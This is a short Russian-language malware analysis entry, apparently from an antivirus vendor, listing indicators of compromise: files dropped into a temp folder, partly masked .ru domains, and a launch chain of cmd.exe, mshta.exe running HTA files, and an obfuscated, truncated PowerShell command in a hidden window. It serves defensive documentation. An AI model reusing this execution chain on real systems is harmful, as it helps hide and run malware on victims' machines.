Техническая информация
- %TEMP%\ced0.tmp\start.bat
- %TEMP%\ced0.tmp\b2.hta
- %TEMP%\ced0.tmp\b2a.hta
- %TEMP%\ced0.tmp\m1.hta
- %TEMP%\ced0.tmp\m1a.hta
- %TEMP%\ced0.tmp\b1.hta
- %TEMP%\ced0.tmp\b1a.hta
- %TEMP%\ced0.tmp\start.bat
- DNS ASK ni##slag.ru
- DNS ASK kf##sa.ru
- DNS ASK br##iop.ru
- DNS ASK bi#.do
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\CED0.tmp\start.bat" <Полный путь к файлу>"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $s...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\CED0.tmp\start.bat" <Полный путь к файлу>"
- '%WINDIR%\syswow64\mshta.exe' "%TEMP%\CED0.tmp\m1.hta"
- '%WINDIR%\syswow64\mshta.exe' "%TEMP%\CED0.tmp\m1a.hta"
- '%WINDIR%\syswow64\timeout.exe' 1
- '%WINDIR%\syswow64\mshta.exe' "%TEMP%\CED0.tmp\b1.hta"
- '%WINDIR%\syswow64\mshta.exe' "%TEMP%\CED0.tmp\b1a.hta"
- '%WINDIR%\syswow64\timeout.exe' 2
- '%WINDIR%\syswow64\mshta.exe' "%TEMP%\CED0.tmp\b2.hta"
- '%WINDIR%\syswow64\mshta.exe' "%TEMP%\CED0.tmp\b2a.hta"